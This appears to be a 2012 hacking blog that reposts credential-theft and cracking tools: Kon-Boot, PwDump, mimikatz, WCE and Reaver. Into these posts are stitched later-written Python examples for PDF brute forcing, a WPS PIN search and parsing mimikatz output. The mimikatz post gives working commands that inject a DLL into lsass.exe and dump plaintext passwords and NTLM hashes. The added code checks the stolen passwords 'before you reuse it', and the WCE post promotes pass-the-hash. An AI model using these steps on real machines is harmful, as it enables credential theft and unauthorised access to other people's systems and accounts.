illmob.org

Kon-Boot 2.1 is out

September 3rd, 2012 by admin in Apple, Privilege Escalation, windows

What’s new in version V2.1?
– Windows 8 support (standard BIOS only, no EFI support)
– Sticky keys feature (lets you spawn a console window with system administrator rights from the logon screen, before any user has logged in)

src: http://www.thelead82.com/kon-boot/

CMOS De-Animator

July 2nd, 2012 by admin in BIOS, Privilege Escalation, windows

Sometimes you can’t get into the BIOS setup because it is password-protected, but you can still boot into Windows. In that case you can try CMOS De-Animator, which clears the BIOS settings (and with them the setup password) from inside Windows. It works on both 32- and 64-bit Windows. If it doesn’t work, try our BIOS password recovery service. CMOS De-Animator can be downloaded from the author’s website.

Reveal Saved Browser Passwords without special software

May 22nd, 2012 by admin in Browsers, Password Info

When you type a password into your web browser it is hidden behind bullets or asterisks. That is fine when you know the password, but if you can’t remember it and the browser is filling it in automatically, you normally have to dig through the browser options or use a third-party utility to reveal it. We covered a way to do this with a simple piece of JavaScript back in 2008. Here’s a simple way to reveal the password using the built-in developer tools of the browser. We’re going to show you how to do it in Firefox 12 and Internet Explorer 9. It is also tested and working in Google Chrome 18 and Opera 11.

Quarks PwDump

May 22nd, 2012 by admin in cracking, Password Info, Privilege Escalation

Quarks PwDump is a new open source tool to dump various types of Windows credentials.

It currently extracts:

  • Local account NT/LM hashes + history
  • Domain account NT/LM hashes + history
  • Cached domain passwords
  • BitLocker recovery information (recovery passwords & key packages)

The tool is currently designed to work live on the operating system without injecting into any process, limiting the risk of undermining its integrity or stability. It requires administrator privileges and is still in beta. Project page: http://code.google.com/p/quarkspwdump/ – more info: http://www.quarkslab.com/en-blog+read+13

OpenCL Multiforcer

May 7th, 2012 by admin in cracking

Currently in beta testing for Linux and only supporting NTLM and MD5 for now, but it lets you brute-force passwords from multiple sources at the same time. Download from here: https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download

Crack PDF passwords using BeagleBone

April 3rd, 2012 by admin in cracking

The password-protected PDF file is passed to the BeagleBone on a thumb drive. Since the BeagleBone runs embedded Linux you don’t need to mess around with figuring out how to read from the device. A press of a button starts the process. Currently the code just uses a brute-force attack, which can test more than 6000 four-character passwords per second on the 700 MHz ARM processor. This is quite slow for any password longer than four or five characters, but [Nuno] does mention the possibility of running several ARM processors in parallel, or using a dictionary (or rainbow table) to speed things up (note that a rainbow table would not help much here: the PDF key derivation mixes in the document’s ID and owner entry, which act as a per-file salt, so tables do not carry over between documents). Either way it’s an interesting project to try on the hardware.
Src: nunoalves.com
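
To make the cost of each guess concrete, here is an added example (not [Nuno]’s code; the post does not say which cracker the BeagleBone runs) that implements the user-password check for a legacy PDF protected by the revision 2 standard security handler (40-bit RC4). Each candidate costs one MD5 over the padded password plus the document’s O entry, P value and ID, and one RC4 key schedule, which is why a 700 MHz ARM core only manages a few thousand guesses a second. The /Encrypt dictionary it cracks is constructed inside the script from a known password; the O entry and document ID are arbitrary constructed bytes, and seconds_to_exhaust turns the post’s 6000 guesses/s figure into worst-case times for a given charset and length.

```python
"""User-password check for a revision 2 (40-bit RC4) PDF standard security
handler, plus the brute force a cracker has to perform against it."""
import hashlib
import itertools
import string
import struct

# Padding string from the PDF 1.7 spec, Algorithm 2 step (a).
PAD = bytes.fromhex(
    "28BF4E5E4E758A4164004E56FFFA01082E2E00B6D0683E802F0CA9FE6453697A"
)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); the PDF spec discards no keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def r2_key(password: bytes, o_entry: bytes, p_value: int, doc_id: bytes) -> bytes:
    """Algorithm 2, revision 2: MD5(padded pw || O || P as LE uint32 || ID[0])[:5]."""
    padded = (password + PAD)[:32]
    p_le = struct.pack("<I", p_value & 0xFFFFFFFF)
    return hashlib.md5(padded + o_entry + p_le + doc_id).digest()[:5]


def r2_u_entry(key: bytes) -> bytes:
    """Algorithm 4: the U entry is the padding string encrypted under the key."""
    return rc4(key, PAD)


def user_password_ok(password: bytes, sec: dict) -> bool:
    """Algorithm 6 for revision 2: recompute U and compare all 32 bytes."""
    key = r2_key(password, sec["O"], sec["P"], sec["ID"])
    return r2_u_entry(key) == sec["U"]


def make_security_dict(password: bytes) -> dict:
    """Constructed /Encrypt dictionary for a document protected with `password`.
    O and ID are arbitrary bytes here; the check only needs them to be present."""
    sec = {"R": 2, "V": 1, "Length": 40, "P": -1,
           "O": bytes(range(0xA0, 0xC0)), "ID": bytes(range(16))}
    sec["U"] = r2_u_entry(r2_key(password, sec["O"], sec["P"], sec["ID"]))
    return sec


def brute_force(sec: dict, alphabet: str, length: int):
    """Exhaustive search over alphabet^length; returns (password or None, guesses)."""
    tried = 0
    for combo in itertools.product(alphabet, repeat=length):
        tried += 1
        cand = "".join(combo).encode()
        if user_password_ok(cand, sec):
            return cand.decode(), tried
    return None, tried


def seconds_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case time to try every password of this shape at the given rate."""
    return alphabet_size ** length / guesses_per_second


if __name__ == "__main__":
    sec = make_security_dict(b"7301")
    print(brute_force(sec, string.digits, 4))  # ('7301', 7302)
    # 6000 guesses/s is the rate quoted for the BeagleBone in the post above.
    for length, alpha in ((4, 36), (6, 36), (8, 95)):
        hours = seconds_to_exhaust(alpha, length, 6000) / 3600
        print(f"{length} chars over {alpha} symbols: {hours:,.1f} h worst case")
```

Running it shows why the author calls the approach slow past five characters: six lowercase-alphanumeric characters already take roughly 100 hours at this rate, and eight printable-ASCII characters run to centuries, so parallel boards or a dictionary are the only practical accelerators.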

MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows keeps your password around for wdigest authentication. The system needs cleartext passwords for Single Sign-On with Terminal Server (the tspkg provider) and for the Windows Digest implementation (the wdigest provider). The passwords are not stored in cleartext in memory, but because they must be available in plaintext for SSO they are encrypted in a reversible way. wdigest needs the password itself to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password, not just its hash. Mimikatz is a tool to recover this plaintext password; it saves you the time and compute needed to brute-force a 16-character NTLM password during a pentest or tech work. You inject a DLL into lsass.exe to recover the information. The blog and program are in French: http://blog.gentilkiwi.com/mimikatz

Below is a demonstration of how to use mimikatz. The commands typed are the lines starting with "mimikatz #" (they were shown in red in the original post); the rest is the tool’s output, which in this version is in French: "Utilisateur principal" is the user name, "Domaine d’authentification" the domain, the msv1_0 line holds the LM and NTLM hashes, and the wdigest and tspkg lines show the plaintext password.
(The privilege::debug command is not required if you are already running as SYSTEM.)

C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/
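
One check worth doing on output like this, as an added example that is not part of the original post or of mimikatz itself: recompute the NT hash of the recovered cleartext (MD4 over the UTF-16LE encoding of the password) and compare it with the ntlm{…} value from the same logon session. A match confirms the plaintext is the account’s current password before you reuse it; a mismatch means the wdigest/tspkg value is stale or belongs to a different credential. The MD4 below follows RFC 1320 rather than relying on hashlib, because newer OpenSSL builds hide md4 behind the legacy provider, and the parser keys on the French labels exactly as printed above. SAMPLE_OUTPUT is the session block from this post copied into the script; the function and field names are this example’s own.

```python
"""Recompute an NT hash from a recovered cleartext and check it against the
NTLM hash shown in the same mimikatz logon session."""
import re
import struct
from typing import Optional

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


# (round function, additive constant, message-word order, shift amounts) per RFC 1320.
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
     tuple(range(16)), (3, 7, 11, 19)),
    (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: pad to 56 mod 64, append bit length (LE), 48 steps/block."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, const, order, shifts in _ROUNDS:
            for i, k in enumerate(order):
                a, b, c, d = d, _rotl((a + f(b, c, d) + x[k] + const) & _MASK, shifts[i % 4]), b, c
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), hex encoded."""
    return md4(password.encode("utf-16le")).hex()


# The logon-session block from this post, copied verbatim (mimikatz 1.0 printed French labels).
SAMPLE_OUTPUT = """\
Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/
"""

_USER_RE = re.compile(r"^Utilisateur principal\s*:\s*(\S.*?)\s*$", re.M)
_DOMAIN_RE = re.compile(r"^Domaine d.authentification\s*:\s*(\S.*?)\s*$", re.M)
_PLAIN_RE = re.compile(r"^\s*(wdigest|tspkg)\s*:\s*(\S.*?)\s*$", re.M)
_HASH_RE = re.compile(r"\b(lm|ntlm)\{\s*([0-9a-fA-F]{32})\s*\}")


def parse_sekurlsa(block: str) -> dict:
    """Pull user, domain, LM/NTLM hashes and plaintext providers out of one
    sekurlsa logon-session block as printed by mimikatz 1.0."""
    rec = {"user": None, "domain": None, "lm": None, "ntlm": None,
           "wdigest": None, "tspkg": None}
    if m := _USER_RE.search(block):
        rec["user"] = m.group(1)
    if m := _DOMAIN_RE.search(block):
        rec["domain"] = m.group(1)
    for name, digest in _HASH_RE.findall(block):
        rec[name] = digest.lower()
    for provider, value in _PLAIN_RE.findall(block):
        rec[provider] = value
    return rec


def plaintext_matches_ntlm(rec: dict) -> Optional[bool]:
    """True if the recovered cleartext hashes to the session's NTLM value,
    False if it does not, None if either piece is missing from the block."""
    pw = rec.get("wdigest") or rec.get("tspkg")
    if pw is None or rec.get("ntlm") is None:
        return None
    return nt_hash(pw) == rec["ntlm"]


if __name__ == "__main__":
    rec = parse_sekurlsa(SAMPLE_OUTPUT)
    print(f"{rec['domain']}\\{rec['user']} ntlm={rec['ntlm']} "
          f"plaintext={rec['wdigest']!r} match={plaintext_matches_ntlm(rec)}")
```

The same nt_hash function is also what you need to turn a known password into the hash a pass-the-hash tool such as WCE consumes, so the check runs in both directions.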

Windows Credentials Editor (WCE) 1.3 x64 released

March 14th, 2012 by admin in cracking, Password Info, Privilege Escalation, windows

Windows Credentials Editor (WCE) lets you list logon sessions and add, change, list and delete the associated credentials (e.g. LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) for use in further attacks, and to obtain Kerberos tickets and reuse them on other Windows or Unix systems. It also dumps passwords in plaintext without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current version: WCE v1.3beta, available as 32-bit and 64-bit builds.

A Frequently Asked Questions (FAQ) page is available on the WCE site.

Estimating Password and Token Entropy in Web Apps

February 22nd, 2012 by admin in cracking, Password Info

Ryan O’Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha; check it out on IOActive’s blog.

Cracking WPA/WPA2 with Reaver

January 24th, 2012 by admin in Linux, Privilege Escalation, Wireless

The WiFi Protected Setup (WPS) protocol is vulnerable to a brute-force attack that lets an attacker recover an access point’s WPS PIN, and from it the WPA/WPA2 passphrase, in a matter of hours using the open source tool Reaver. Think your 32-character alphanumeric password is uncrackable? If your wireless router has WPS enabled, it may hand your passphrase back to the attacker in plaintext in less than 10 hours. WPS lets users enter an 8-digit PIN to join a secured network without typing the passphrase. The brute force is tractable because the eighth digit is a checksum and the access point acknowledges the first four digits separately from the last three, so an attacker needs at most 10,000 + 1,000 = 11,000 guesses rather than 10^8. When a client supplies the correct PIN, the access point essentially hands over the WPA/WPA2 PSK needed to connect to the network. Reaver determines the access point’s PIN and then extracts the PSK for the attacker. When we tested Reaver in our lab we were able to recover the WPA password in 1.5 hours, and the longest run was 7.5 hours.
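
As an added illustration, not code from the Reaver project or from the original post, the following Python shows why this brute force finishes in hours rather than years and also gives the entropy comparison that the IOActive post above is about: it computes the WPS PIN checksum digit, walks the PIN space the way Reaver does (first four digits, then the remaining three, with the eighth digit fixed by the checksum), and compares the effective key space in bits with that of the 32-character alphanumeric passphrase mentioned above. The access point is a constructed stand-in that only models which message gets rejected; the result labels NACK_M4/NACK_M6, the class and function names, and the 1 PIN per 2 seconds rate in the demo are this example’s own assumptions.

```python
"""Why the WPS PIN falls to brute force in hours: a checksum digit plus a
two-phase search, compared with the entropy of a long WPA passphrase."""
from math import log2
from typing import Callable, Optional

# Worst case for the split search: 10^4 first halves + 10^3 second halves.
MAX_ATTEMPTS = 10**4 + 10**3


def wps_checksum(pin7: int) -> int:
    """Eighth PIN digit computed over the first seven (WPS spec, same algorithm
    as hostapd's wps_pin_checksum)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: int) -> bool:
    return 0 <= pin <= 99_999_999 and pin % 10 == wps_checksum(pin // 10)


def full_pin(first_half: str, second_three: str) -> str:
    """Assemble an 8-digit PIN whose last digit is the correct checksum."""
    seven = int(first_half + second_three)
    return f"{seven:07d}{wps_checksum(seven)}"


class SimulatedAP:
    """Constructed stand-in for an access point. It models only what Reaver
    keys on: a wrong first half is rejected right after M4, a wrong second
    half right after M6. Real APs may also rate-limit or lock WPS, which this
    ignores."""

    def __init__(self, pin: str):
        if not wps_pin_valid(int(pin)):
            raise ValueError("PIN fails checksum")
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK_M4"
        if pin[4:] != self._pin[4:]:
            return "NACK_M6"
        return "OK"


def reaver_style_search(try_pin: Callable[[str], str]) -> Optional[str]:
    """Phase 1 fixes the first four digits, phase 2 the next three; the eighth
    is implied by the checksum, so at most MAX_ATTEMPTS exchanges are needed."""
    first = None
    for h in range(10_000):
        cand = full_pin(f"{h:04d}", "000")
        result = try_pin(cand)
        if result == "OK":
            return cand
        if result == "NACK_M6":
            first = cand[:4]
            break
    if first is None:
        return None
    for t in range(1_000):
        cand = full_pin(first, f"{t:03d}")
        if try_pin(cand) == "OK":
            return cand
    return None


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random string: length * log2(alphabet size)."""
    return length * log2(alphabet_size)


def hours_to_exhaust(attempts: int, attempts_per_second: float) -> float:
    return attempts / attempts_per_second / 3600


if __name__ == "__main__":
    ap = SimulatedAP("12345670")
    print(reaver_style_search(ap.try_pin), ap.attempts)  # 12345670 1803
    print(f"8-digit PIN, naive:        {entropy_bits(10, 8):.1f} bits")
    print(f"8-digit PIN, as attacked:  {log2(MAX_ATTEMPTS):.1f} bits")
    print(f"32-char alphanumeric PSK:  {entropy_bits(62, 32):.1f} bits")
    # Assumed rate of one PIN attempt every two seconds, not a measured figure.
    print(f"worst case at 0.5 PIN/s:   {hours_to_exhaust(MAX_ATTEMPTS, 0.5):.1f} h")
```

The comparison is the whole point of the post: the passphrase sits at roughly 190 bits, but with WPS enabled the access point reduces the problem to about 13 bits, and the simulated run above recovers the PIN in 1,803 exchanges.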
